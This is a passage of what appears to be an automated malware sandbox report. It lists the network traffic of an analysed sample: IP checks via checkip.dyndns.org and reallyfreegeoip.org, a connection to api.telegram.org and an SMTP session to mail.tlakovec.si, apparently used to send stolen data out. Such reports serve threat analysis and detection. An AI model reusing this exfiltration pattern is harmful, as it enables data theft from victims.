Nov 7, 2024 12:49:07.990669012 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:07.994436026 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:07.994522095 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:07.994718075 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:07.996649027 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.001019955 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:08.001368046 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:08.002554893 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:08.007134914 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.007294893 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.007392883 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:08.013300896 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.016717911 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.065757036 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:08.122999907 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.133168936 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.133323908 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:08.133490086 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.140799999 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:49:08.141083002 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:49:08.644323111 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:08.648875952 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:08.653700113 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:08.797954082 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:08.847174883 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:08.893269062 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:08.893317938 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:08.893410921 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:08.906167984 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:08.906183958 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.524358034 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.524449110 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:09.529299021 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:09.529309034 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.529721975 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.581593990 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:09.718275070 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:09.763329983 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.855595112 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.855715036 CET	443	49714	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:09.855858088 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:09.966368914 CET	49714	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.022247076 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.027123928 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:10.184925079 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:10.213299036 CET	49716	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.213340044 CET	443	49716	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:10.213406086 CET	49716	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.213748932 CET	49716	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.213762999 CET	443	49716	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:10.237782001 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.817327023 CET	443	49716	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:10.819863081 CET	49716	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.819894075 CET	443	49716	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:10.966236115 CET	443	49716	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:10.966339111 CET	443	49716	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:10.966501951 CET	49716	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.966964960 CET	49716	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:10.970150948 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.971333981 CET	49717	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.975250959 CET	80	49713	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:10.975325108 CET	49713	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.976123095 CET	80	49717	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:10.976201057 CET	49717	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.976272106 CET	49717	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:10.981076002 CET	80	49717	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:11.606470108 CET	80	49717	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:11.607809067 CET	49719	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:11.607840061 CET	443	49719	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:11.608042002 CET	49719	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:11.608377934 CET	49719	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:11.608395100 CET	443	49719	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:11.612802982 CET	49673	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:11.612809896 CET	49674	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:11.659673929 CET	49717	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:12.050314903 CET	49672	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:12.205281019 CET	443	49719	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:12.207067966 CET	49719	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:12.207087040 CET	443	49719	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:12.344639063 CET	443	49719	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:12.344747066 CET	443	49719	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:12.344832897 CET	49719	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:12.345263958 CET	49719	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:12.349922895 CET	49720	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:12.354821920 CET	80	49720	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:12.354963064 CET	49720	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:12.355129004 CET	49720	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:12.359889984 CET	80	49720	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:13.009958029 CET	80	49720	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:13.011199951 CET	49722	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:13.011250019 CET	443	49722	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:13.011382103 CET	49722	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:13.011651039 CET	49722	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:13.011667967 CET	443	49722	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:13.050312042 CET	49720	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:13.620625973 CET	443	49722	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:13.624699116 CET	49722	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:13.624741077 CET	443	49722	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:13.763036966 CET	443	49722	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:13.763164043 CET	443	49722	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:13.763253927 CET	49722	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:13.763889074 CET	49722	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:13.767168999 CET	49720	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:13.768184900 CET	49723	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:13.772470951 CET	80	49720	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:13.773017883 CET	80	49723	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:13.773088932 CET	49720	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:13.773119926 CET	49723	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:13.773189068 CET	49723	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:13.777977943 CET	80	49723	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:13.813344002 CET	443	49708	173.222.162.60	192.168.2.12
Nov 7, 2024 12:49:13.813461065 CET	49708	443	192.168.2.12	173.222.162.60
Nov 7, 2024 12:49:14.423204899 CET	80	49723	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:14.424624920 CET	49724	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:14.424665928 CET	443	49724	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:14.424736023 CET	49724	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:14.424968958 CET	49724	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:14.424978971 CET	443	49724	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:14.472194910 CET	49723	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:15.041439056 CET	443	49724	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:15.043602943 CET	49724	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:15.043625116 CET	443	49724	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:15.186438084 CET	443	49724	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:15.186530113 CET	443	49724	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:15.186598063 CET	49724	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:15.187402010 CET	49724	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:15.191173077 CET	49723	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:15.192677975 CET	49725	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:15.196502924 CET	80	49723	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:15.196576118 CET	49723	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:15.197633982 CET	80	49725	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:15.197753906 CET	49725	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:15.197859049 CET	49725	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:15.202635050 CET	80	49725	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:15.875992060 CET	80	49725	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:15.877376080 CET	49726	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:15.877418995 CET	443	49726	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:15.877494097 CET	49726	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:15.877722979 CET	49726	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:15.877734900 CET	443	49726	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:15.925302982 CET	49725	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:16.657057047 CET	443	49726	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:16.690702915 CET	49726	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:16.690740108 CET	443	49726	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:16.833065987 CET	443	49726	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:16.833163023 CET	443	49726	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:16.833233118 CET	49726	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:16.840431929 CET	49726	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:16.972009897 CET	49725	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:16.977930069 CET	80	49725	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:16.979089022 CET	49725	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:17.047033072 CET	49727	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:17.052202940 CET	80	49727	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:17.052274942 CET	49727	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:17.052427053 CET	49727	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:17.058057070 CET	80	49727	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:17.709129095 CET	80	49727	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:17.710758924 CET	49728	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:17.710808992 CET	443	49728	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:17.710922956 CET	49728	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:17.711182117 CET	49728	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:17.711199045 CET	443	49728	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:17.753552914 CET	49727	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:18.326724052 CET	443	49728	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:18.328444958 CET	49728	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:18.328469992 CET	443	49728	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:18.471463919 CET	443	49728	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:18.471569061 CET	443	49728	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:18.471653938 CET	49728	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:18.472347021 CET	49728	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:18.475630999 CET	49727	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:18.476660967 CET	49729	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:18.480741024 CET	80	49727	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:18.480860949 CET	49727	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:18.481491089 CET	80	49729	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:18.481575012 CET	49729	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:18.481693983 CET	49729	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:18.486403942 CET	80	49729	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:19.117049932 CET	80	49729	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:19.127331018 CET	49730	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:19.127372980 CET	443	49730	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:19.127453089 CET	49730	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:19.127748966 CET	49730	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:19.127758980 CET	443	49730	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:19.159708023 CET	49729	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:19.724330902 CET	443	49730	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:19.726183891 CET	49730	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:19.726208925 CET	443	49730	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:19.864650965 CET	443	49730	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:19.864746094 CET	443	49730	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:19.864869118 CET	49730	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:19.865317106 CET	49730	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:19.868041992 CET	49729	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:19.869081020 CET	49731	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:19.873393059 CET	80	49729	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:19.873486042 CET	49729	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:19.873893976 CET	80	49731	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:19.873960972 CET	49731	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:19.874064922 CET	49731	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:19.879002094 CET	80	49731	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:20.514695883 CET	80	49731	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:20.516161919 CET	49732	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:20.516210079 CET	443	49732	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:20.516380072 CET	49732	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:20.516556025 CET	49732	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:20.516566992 CET	443	49732	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:20.565932989 CET	49731	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:21.111352921 CET	443	49732	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:21.113229990 CET	49732	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:21.113259077 CET	443	49732	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:21.254955053 CET	443	49732	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:21.255048037 CET	443	49732	188.114.96.3	192.168.2.12
Nov 7, 2024 12:49:21.255110979 CET	49732	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:21.255615950 CET	49732	443	192.168.2.12	188.114.96.3
Nov 7, 2024 12:49:21.267704010 CET	49731	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:21.272795916 CET	80	49731	158.101.44.242	192.168.2.12
Nov 7, 2024 12:49:21.272861004 CET	49731	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:21.275731087 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:21.275774002 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:21.275837898 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:21.276272058 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:21.276283979 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.106400967 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.106533051 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:22.108628988 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:22.108642101 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.108932018 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.110342026 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:22.155347109 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.375513077 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.375577927 CET	443	49733	149.154.167.220	192.168.2.12
Nov 7, 2024 12:49:22.375665903 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:22.381452084 CET	49733	443	192.168.2.12	149.154.167.220
Nov 7, 2024 12:49:27.618525982 CET	49717	80	192.168.2.12	158.101.44.242
Nov 7, 2024 12:49:27.856184006 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:27.865034103 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:27.868618965 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:29.313038111 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:29.313397884 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:29.318680048 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:29.576176882 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:29.576847076 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:29.581777096 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:29.839657068 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:29.840074062 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:29.844943047 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:30.143505096 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:30.143800974 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:30.148647070 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:30.406229973 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:30.415463924 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:30.420361996 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:30.688939095 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:30.689158916 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:30.694025993 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.224680901 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.225303888 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.225379944 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:31.226130009 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:31.226197004 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:31.226219893 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:31.226243973 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:49:31.231029987 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.231041908 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.231071949 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.231096029 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.506182909 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:49:31.550343990 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:50:38.139206886 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:50:38.139425993 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:50:38.139875889 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:50:38.140033960 CET	49709	443	192.168.2.12	13.107.246.45
Nov 7, 2024 12:50:38.144258976 CET	443	49709	13.107.246.45	192.168.2.12
Nov 7, 2024 12:51:07.816234112 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:51:07.821296930 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:51:08.280977011 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:51:08.281076908 CET	49741	587	192.168.2.12	212.44.112.138
Nov 7, 2024 12:51:08.286395073 CET	587	49741	212.44.112.138	192.168.2.12
Nov 7, 2024 12:51:08.286454916 CET	49741	587	192.168.2.12	212.44.112.138

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 12:49:07.966604948 CET	65529	53	192.168.2.12	1.1.1.1
Nov 7, 2024 12:49:07.974148035 CET	53	65529	1.1.1.1	192.168.2.12
Nov 7, 2024 12:49:08.880259037 CET	49845	53	192.168.2.12	1.1.1.1
Nov 7, 2024 12:49:08.887878895 CET	53	49845	1.1.1.1	192.168.2.12
Nov 7, 2024 12:49:21.268287897 CET	52849	53	192.168.2.12	1.1.1.1
Nov 7, 2024 12:49:21.275122881 CET	53	52849	1.1.1.1	192.168.2.12
Nov 7, 2024 12:49:27.792509079 CET	51648	53	192.168.2.12	1.1.1.1
Nov 7, 2024 12:49:27.847837925 CET	53	51648	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 12:49:07.966604948 CET	192.168.2.12	1.1.1.1	0x50ac	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:08.880259037 CET	192.168.2.12	1.1.1.1	0x2637	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:21.268287897 CET	192.168.2.12	1.1.1.1	0xad64	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:27.792509079 CET	192.168.2.12	1.1.1.1	0x1152	Standard query (0)	mail.tlakovec.si	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 12:49:07.974148035 CET	1.1.1.1	192.168.2.12	0x50ac	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 12:49:07.974148035 CET	1.1.1.1	192.168.2.12	0x50ac	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:07.974148035 CET	1.1.1.1	192.168.2.12	0x50ac	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:07.974148035 CET	1.1.1.1	192.168.2.12	0x50ac	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:07.974148035 CET	1.1.1.1	192.168.2.12	0x50ac	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:07.974148035 CET	1.1.1.1	192.168.2.12	0x50ac	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:08.887878895 CET	1.1.1.1	192.168.2.12	0x2637	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:08.887878895 CET	1.1.1.1	192.168.2.12	0x2637	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:21.275122881 CET	1.1.1.1	192.168.2.12	0xad64	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:22.751629114 CET	1.1.1.1	192.168.2.12	0x6786	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:22.751629114 CET	1.1.1.1	192.168.2.12	0x6786	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:23.407455921 CET	1.1.1.1	192.168.2.12	0x9850	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 12:49:23.407455921 CET	1.1.1.1	192.168.2.12	0x9850	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 7, 2024 12:49:27.847837925 CET	1.1.1.1	192.168.2.12	0x1152	No error (0)	mail.tlakovec.si		212.44.112.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49713	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:07.994718075 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
